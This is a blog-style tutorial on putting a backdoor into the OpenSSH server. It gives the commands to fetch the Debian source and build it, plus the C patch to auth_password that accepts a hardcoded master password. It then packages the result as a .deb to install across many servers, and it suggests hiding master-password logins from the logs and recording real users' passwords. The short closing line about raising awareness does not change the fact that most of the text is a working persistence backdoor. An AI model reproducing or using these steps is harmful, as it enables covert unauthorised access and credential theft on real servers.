Backdooring the OpenSSH server

Disclaimer

I'm not responsible for what you do whit this knowledge... bla bla bla, whatever...
This is the serious part: You can break the ssh server and lock yourself out, be careful.

What is openssh-server?

OpenSSH-server is an open-source software that allows users to control their computer/server using an ssh client, this software is widely used by sysadmins to manage their servers.

What exactly are we going to do?

  • We are going to download the source code of openssh-server.
  • Edit the code to always accept the password "master_of_puppets"
  • Compile the code and make a binary package so we can easily distribute it.

Why would you want to backdoor the OpenSSH daemon?

There are a lot of reasons why you would want to do this, here's some of them:

  • Let's say you want to have a universal password so you can ssh as any user you want using the same password.
  • You hate remembering different passwords on thousands of servers you have.
  • You hacked the NSA and you want to maintain persistence.

The process

Getting the source code

So the first step is to get the source code of the openssh-server, there are multiple ways of doing this, the main git repository is hosted here git://anongit.mindrot.org/openssh.git but for the sake of simplicity I'm going to download the source code using aptitude (the builtin package manager on Debian), I'm also going to make a separate directory for our project

mkdir /tmp/sin && cd /tmp/sin  
apt-get source openssh-server

Coding-in the backdoor

Okay so now we should edit the part of the source code that handles the password login and make it accept our master password. So normally you would have to find the place you want to edit on your own but I cheated found a patch file that automates this whole process on GitHub(I'll leave the link to it in the bottom of this post) and saw that it patches the 'auth-passwd.c' file.
So lets open the 'auth-passwd.c' file in our favorite editor and edit some code!

nano /tmp/sin/openssh-7.4p1/auth-passwd.c

The file is quite small so we can easily find the password checking function, because OpenSSH is coded in the C language it's smart to look for 'strcmp' (this function compares two strings), comments can help too :)

auth_password function with comment

So now we know that the 'auth_password' function is responsible for checking the password, it takes two arguments:

auth_password(Authctxt *authctxt, const char *password)

authctxt is a struct that is defined in auth.h, but we don't need it.
password is a char array that holds the client's password.
Ok so we know that this function returns true if the password is correct, let's add an if statement that compares the password variable with our master password and return true if they match:

if (strcmp(password, "master_of_puppets") == 0)  
    return 1;

Add this code to the beginning of the auth_password function and you're set.
Now the beginning of the function should look like this:

patched code

Compiling the code

Let's change our working directory to our source directory.

cd /tmp/sin/openssh-7.4p1

You will need to install some dependencies to compile the code, if your system is using aptitude it's as simple as:

apt-get build-dep openssh-server

Now all you have to do is compile! Let's compile a .deb file so we can install our version of openssh-server on other servers without the need of recompiling it for every server you own:

dpkg-buildpackage -rfakeroot -uc -b

Installing our version of openssh-server

The deb package should now be one directory higher that the source code (in our case it's in /tmp/sin)
We can now install our package:

dpkg -i openssh-server_7.4p1-10+deb9u2_i386.deb

The package name will differ you can use ls to see what files you have in the directory.

Testing

Let's ssh to ourselves to test if the master password works:

ssh 127.0.0.1

Let's enter our master password and:

successful login

We are in!

Final notes

You can improve this by:

  • Stop logging of master password logins
  • Logging legit user passwords to a file

The purpose of this tutorial was to show you how easy it is to add your own code to open-source software, make you aware of the dangers of backdoors and teach you how to add backdoors to open-source software.

Source links